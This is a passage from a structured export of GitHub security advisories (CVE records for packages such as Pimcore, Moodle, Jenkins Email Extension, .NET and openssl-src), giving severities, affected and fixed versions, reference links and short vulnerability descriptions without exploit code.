[{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41723'}, {'type': 'WEB', 'url': 'https://go.dev/cl/468135'}, {'type': 'WEB', 'url': 'https://go.dev/cl/468295'}, {'type': 'WEB', 'url': 'https://go.dev/issue/57855'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1571'}, {'type': 'WEB', 'url': 'https://vuln.go.dev/ID/GO-2023-1571.json'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T14:00:02Z', 'nvd_published_at': '2023-02-28T18:15:00Z'}" 1.4.0,GHSA-6vv4-qq3r-9rv8,2023-02-24T16:02:36Z,2023-02-12T15:30:25Z,,['CVE-2023-0790'],Uncaught Exception in thorsten/phpmyfaq,Uncaught Exception in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0790'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/f34d84dfe551ecdd675916e45cc0606e04a0734e'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/06af150b-b481-4248-9a48-56ded2814156'}]","{'cwe_ids': ['CWE-248'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T01:04:31Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-2g5j-5x95-r6hr,2023-02-06T23:16:16Z,2023-02-06T23:16:16Z,,['CVE-2020-29529'],Unsafe tar unpacking in HashiCorp go-slug,HashiCorp go-slug before 0.5.0 does not address attempts at directory traversal involving ../ and symlinks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/go-slug'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29529'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-slug/pull/12'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-slug/commit/28cafc59c8da6126a3ae94dfa84181df4073454f'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-slug/commit/764785bc4cbb9e600ad1cf1a6bd21b535c182983'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/go-slug'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-slug/compare/v0.4.3...v0.5.0'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-slug/releases/tag/v0.5.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0094'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-262-zipslip-go-slug'}]","{'cwe_ids': ['CWE-22', 'CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T23:16:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-8xv4-jj4h-qww6,2023-02-13T16:56:35Z,2023-02-02T17:00:19Z,,['CVE-2023-23937'],Pimcore contains Unrestricted Upload of File with Dangerous Type,"### Impact The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain. ### Patches Update to version 10.5.16 or apply this patch manually https://github.com/pimcore/pimcore/pull/14125.patch","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-8xv4-jj4h-qww6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23937'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14125'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/75a448ef8ac74424cf4e723afeb6d05f9eed872f'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/aa7ee076-d729-4fcc-9bcc-48bcbb8eac38/'}]","{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T17:00:19Z', 'nvd_published_at': '2023-02-03T20:15:00Z'}" 1.4.0,GHSA-c2jc-4fpr-4vhg,2023-02-08T22:38:10Z,2023-02-08T22:38:10Z,,['CVE-2023-25166'],@sideway/formula contains Regular Expression Denial of Service (ReDoS) Vulnerability,"### Impact User-provided strings to formula's parser might lead to polynomial execution time. ### Patches Users should upgrade to 3.0.1+. ### Workarounds None.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@sideway/formula'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hapijs/formula/security/advisories/GHSA-c2jc-4fpr-4vhg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25166'}, {'type': 'WEB', 'url': 'https://github.com/hapijs/formula/commit/9fbc20a02d75ae809c37a610a57802cd1b41b3fe'}, {'type': 'PACKAGE', 'url': 'https://github.com/hapijs/formula'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:38:10Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-grmj-gpwm-98ww,2023-03-02T19:29:09Z,2023-02-17T21:30:41Z,,['CVE-2023-23922'],Moodle Cross-site Scripting vulnerability,The vulnerability was found Moodle which exists due to insufficient sanitization of user-supplied data in blog search. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website. This flaw allows a remote attacker to perform cross-site scripting (XSS) attacks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-beta'}, {'fixed': '4.0.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0-beta'}, {'fixed': '4.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23922'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2162547'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=443273#p1782022'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-76861'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T19:29:09Z', 'nvd_published_at': '2023-02-17T20:15:00Z'}" 1.4.0,GHSA-4xgv-j62q-h3rj,2023-06-13T23:50:39Z,2023-02-07T18:36:47Z,,[],Panic during unmarshal of Hello Verify Request in github.com/pion/dtls/v2,"### Impact During the unmarshalling of a hello verify request we could try to unmarshal into too small a buffer. is could result in a panic leading the program to crash. This issue could be abused to cause a denial of service. ### Workaround None, upgrade to 2.2.4 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pion/dtls'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pion/dtls/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pion/dtls/security/advisories/GHSA-4xgv-j62q-h3rj'}, {'type': 'WEB', 'url': 'https://github.com/pion/dtls/commit/a50d26c5e4eed2ca87509494ffef2d2ebd22b1eb'}, {'type': 'PACKAGE', 'url': 'https://github.com/pion/dtls'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1534'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T18:36:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-jfpg-jggf-rpph,2023-02-23T22:08:35Z,2023-02-12T15:30:25Z,,['CVE-2023-0786'],Cross-site Scripting in thorsten/phpmyfaq,Cross-site Scripting (XSS) - Generic in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0786'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/ce676eb9e9d8cb7864f36ee124e838b1ad15415f'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8c74ccab-0d1d-4c6b-a0fa-803aa65de04f'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T01:06:17Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-c9c2-wcxh-3w5j,2023-02-23T21:31:10Z,2023-02-15T15:30:40Z,,['CVE-2023-25765'],Sandbox escape in Jenkins Email Extension Plugin,"In Jenkins Email Extension Plugin 2.93 and earlier, templates defined inside a folder were not subject to Script Security protection, allowing attackers able to define email templates in folders to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:email-ext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.93'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25765'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/email-ext-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2939'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]","{'cwe_ids': ['CWE-693'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:29:32Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}" 1.4.0,GHSA-fxqx-xgqq-gf42,2023-02-15T15:15:40Z,2023-02-06T18:30:30Z,,['CVE-2020-36660'],Exposure of Sensitive Information in EVE-SRP,A vulnerability was found in paxswill EVE Ship Replacement Program 0.12.11. It has been rated as problematic. This issue affects some unknown processing of the file src/evesrp/views/api.py of the component User Information Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. Upgrading to version 0.12.12 is able to address this issue. The name of the patch is 9e03f68e46e85ca9c9694a6971859b3ee66f0240. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220211.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'EVE-SRP'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36660'}, {'type': 'WEB', 'url': 'https://github.com/paxswill/evesrp/commit/9e03f68e46e85ca9c9694a6971859b3ee66f0240'}, {'type': 'PACKAGE', 'url': 'https://github.com/paxswill/evesrp'}, {'type': 'WEB', 'url': 'https://github.com/paxswill/evesrp/releases/tag/v0.12.12'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220211'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220211'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T15:15:40Z', 'nvd_published_at': '2023-02-06T17:15:00Z'}" 1.4.0,GHSA-p7qq-rrvw-x55x,2023-03-07T04:02:34Z,2023-02-25T03:30:17Z,,['CVE-2023-1033'],Froxlor Cross-Site Request Forgery vulnerability,Froxlor prior to version 2.0.11 has a Cross-Site Request Forgery vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1033'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/4003a8d2b60728a77476d1d4f5aa5c635f128950'}, {'type': 'PACKAGE', 'url': 'https://github.com/froxlor/froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ba3cd929-8b60-4d8d-b77d-f28409ecf387'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:26:13Z', 'nvd_published_at': '2023-02-25T01:15:00Z'}" 1.4.0,GHSA-mrpv-5pmr-p92h,2023-03-03T23:26:02Z,2023-02-23T09:30:17Z,,['CVE-2023-25621'],Improper Privilege Management in Apache Sling,"Privilege Escalation vulnerability in Apache Software Foundation Apache Sling. Any content author is able to create i18n dictionaries in the repository in a location the author has write access to. As these translations are used across the whole product, it allows an author to change any text or dialog in the product. For example an attacker might fool someone by changing the text on a delete button to ""Info"". This issue affects the i18n module of Apache Sling versions before 2.6.2. Version 2.6.2 and higher limit by default i18m dictionaries to certain paths in the repository (/libs and /apps). Users of the module are advised to update to version 2.6.2 or higher, check the configuration for resource loading and then adjust the access permissions for the configured path accordingly.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.i18n'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25621'}, {'type': 'WEB', 'url': 'https://github.com/apache/sling-org-apache-sling-i18n/pull/9'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SLING-11744'}, {'type': 'WEB', 'url': 'https://seclists.org/oss-sec/2023/q1/112'}, {'type': 'WEB', 'url': 'https://sling.apache.org/news.html'}]","{'cwe_ids': ['CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T21:38:53Z', 'nvd_published_at': '2023-02-23T09:15:00Z'}" 1.4.0,GHSA-824j-wqm8-89mj,2023-02-14T22:00:54Z,2023-02-14T22:00:54Z,,['CVE-2023-21808'],.NET Remote Code Execution Vulnerability ,"# Microsoft Security Advisory CVE-2023-21808: .NET Remote Code Execution Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in how .NET reads debugging symbols, where reading a malicious symbols file may result in remote code execution. ## Discussion Discussion for this issue can be found at https://github.com/dotnet/runtime/issues/82112 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0 application running on .NET 7.0.2 or earlier. * Any .NET 6.0 application running on .NET 6.0.13 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm)|>= 7.0.0, <= 7.0.2|7.0.3 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64)|>= 7.0.0, <= 7.0.2|7.0.3 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64)|>= 7.0.0, <= 7.0.2|7.0.3 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86)|>= 7.0.0, <= 7.0.2|7.0.3 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm)|>= 6.0.0, <= 6.0.13|6.0.14 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64)|>= 6.0.0, <= 6.0.13|6.0.14 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64)|>= 6.0.0, <= 6.0.13|6.0.14 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86)|>= 6.0.0, <= 6.0.13|6.0.14 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you have .NET Core 3.1 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; * If you are using one of the affected packages, please update to the patched version listed above. ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.3 or SDK 7.0.103 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.14 or SDK 6.0.114 (for Visual Studio 2022 v17.1) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### Acknowledgements [Johan Gorter](https://www.linkedin.com/in/jgorter/) with [AFAS Software](https://www.afas.nl/) ### External Links [CVE-2023-21808]( https://www.cve.org/CVERecord?id=CVE-2023-21808) ### Revisions V1.0 (February 14, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-02-14_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.2'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.13'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.2'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.13'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.2'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.13'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.2'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.13'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-824j-wqm8-89mj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-21808'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21808'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T22:00:54Z', 'nvd_published_at': '2023-02-14T21:15:00Z'}" 1.4.0,GHSA-r7jw-wp68-3xch,2023-02-21T20:00:42Z,2023-02-08T22:28:34Z,,['CVE-2023-0215'],openssl-src vulnerable to Use-after-free following `BIO_new_NDEF`,"The public API function `BIO_new_NDEF` is a helper function used for streaming ASN.1 data via a `BIO`. It is primarily used internally to OpenSSL to support the SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by end user applications. The function receives a `BIO` from the caller, prepends a new `BIO_f_asn1` filter `BIO` onto the front of it to form a `BIO` chain, and then returns the new head of the `BIO` chain to the caller. Under certain conditions, for example if a CMS recipient public key is invalid, the new filter `BIO` is freed and the function returns a `NULL` result indicating a failure. However, in this case, the `BIO` chain is not properly cleaned up and the `BIO` passed by the caller still retains internal pointers to the previously freed filter `BIO`. If the caller then goes on to call `BIO_pop()` on the `BIO` then a use-after-free will occur. This will most likely result in a crash. This scenario occurs directly in the internal function `B64_write_ASN1()` which may cause `BIO_new_NDEF()` to be called and will subsequently call `BIO_pop()` on the `BIO`. This internal function is in turn called by the public API functions `PEM_write_bio_ASN1_stream`, `PEM_write_bio_CMS_stream`, `PEM_write_bio_PKCS7_stream`, `SMIME_write_ASN1`, `SMIME_write_CMS` and `SMIME_write_PKCS7`. Other public API functions that may be impacted by this include `i2d_ASN1_bio_stream`, `BIO_new_CMS`, `BIO_new_PKCS7`, `i2d_CMS_bio_stream` and `i2d_PKCS7_bio_stream`. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '111.25.0'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0215'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0009.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230427-0007/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230427-0009/'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230207.txt'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:28:34Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-8mwq-mj73-qv68,2023-02-24T18:48:34Z,2023-02-16T15:30:28Z,2023-02-24T18:48:34Z,[],Duplicate advisory: Sequelize vulnerable to Improper Filtering of Special Elements,"## Duplicate advisory This advisory has been withdrawn because it is a duplicate of [GHSA-f598-mfpv-gmfx](https://github.com/advisories/GHSA-f598-mfpv-gmfx). This link is maintained to preserve external references. ## Original Description Due to improper attribute filtering in the sequelize js library, an attacker can peform SQL injections. This issue can be mitigated by not accepting untrusted input.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@sequelize/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, 